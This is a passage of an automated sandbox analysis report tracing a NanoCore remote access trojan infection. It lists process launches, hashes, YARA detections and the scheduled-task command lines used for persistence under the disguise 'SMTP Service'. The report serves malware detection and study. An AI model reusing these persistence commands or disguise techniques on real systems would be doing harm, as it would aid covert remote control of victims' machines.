            • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.2356337271.0000000000620000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.2356337271.0000000000620000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, Author: Joe Security
            Reputation:low

            General

            Start time:19:12:48
            Start date:27/01/2021
            Path:C:\Windows\SysWOW64\schtasks.exe
            Wow64 process (32bit):true
            Commandline:'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp'
            Imagebase:0xca0000
            File size:179712 bytes
            MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:19:12:49
            Start date:27/01/2021
            Path:C:\Windows\SysWOW64\schtasks.exe
            Wow64 process (32bit):true
            Commandline:'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5A32.tmp'
            Imagebase:0xb40000
            File size:179712 bytes
            MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:19:12:49
            Start date:27/01/2021
            Path:C:\Windows\System32\taskeng.exe
            Wow64 process (32bit):false
            Commandline:taskeng.exe {C7405FE6-0EEB-43B9-A9C9-0A01615FAA8D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
            Imagebase:0xff1a0000
            File size:464384 bytes
            MD5 hash:65EA57712340C09B1B0C427B4848AE05
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate

            General

            Start time:19:12:50
            Start date:27/01/2021
            Path:C:\Users\user\AppData\Roaming\JNM.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Roaming\JNM.exe 0
            Imagebase:0xce0000
            File size:1973760 bytes
            MD5 hash:10D30AD1922421E73E133AD020DF424F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Reputation:low

            General

            Start time:19:12:51
            Start date:27/01/2021
            Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
            Wow64 process (32bit):true
            Commandline:'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
            Imagebase:0x150000
            File size:1973760 bytes
            MD5 hash:10D30AD1922421E73E133AD020DF424F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Antivirus matches:
            • Detection: 100%, Joe Sandbox ML
            • Detection: 35%, ReversingLabs
            Reputation:low

            General

            Start time:19:12:56
            Start date:27/01/2021
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
            Imagebase:0x4a8f0000
            File size:302592 bytes
            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:19:12:57
            Start date:27/01/2021
            Path:C:\Windows\SysWOW64\timeout.exe
            Wow64 process (32bit):true
            Commandline:timeout 1
            Imagebase:0xc10000
            File size:27136 bytes
            MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate

            General

            Start time:19:12:58
            Start date:27/01/2021
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
            Imagebase:0x4a8f0000
            File size:302592 bytes
            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:19:12:59
            Start date:27/01/2021
            Path:C:\Windows\SysWOW64\timeout.exe
            Wow64 process (32bit):true
            Commandline:timeout 1
            Imagebase:0x7f0000
            File size:27136 bytes
            MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate

            General

            Start time:19:12:59
            Start date:27/01/2021
            Path:C:\Users\user\AppData\Roaming\JNM.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Roaming\JNM.exe
            Imagebase:0xce0000
            File size:1973760 bytes
            MD5 hash:10D30AD1922421E73E133AD020DF424F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Reputation:low

            General

            Start time:19:13:00
            Start date:27/01/2021
            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            Wow64 process (32bit):true
            Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Imagebase:0x400000
            File size:543304 bytes
            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:19:13:01
            Start date:27/01/2021
            Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
            Wow64 process (32bit):true
            Commandline:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
            Imagebase:0x150000
            File size:1973760 bytes
            MD5 hash:10D30AD1922421E73E133AD020DF424F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Reputation:low

            Disassembly

            Code Analysis

            Reset < >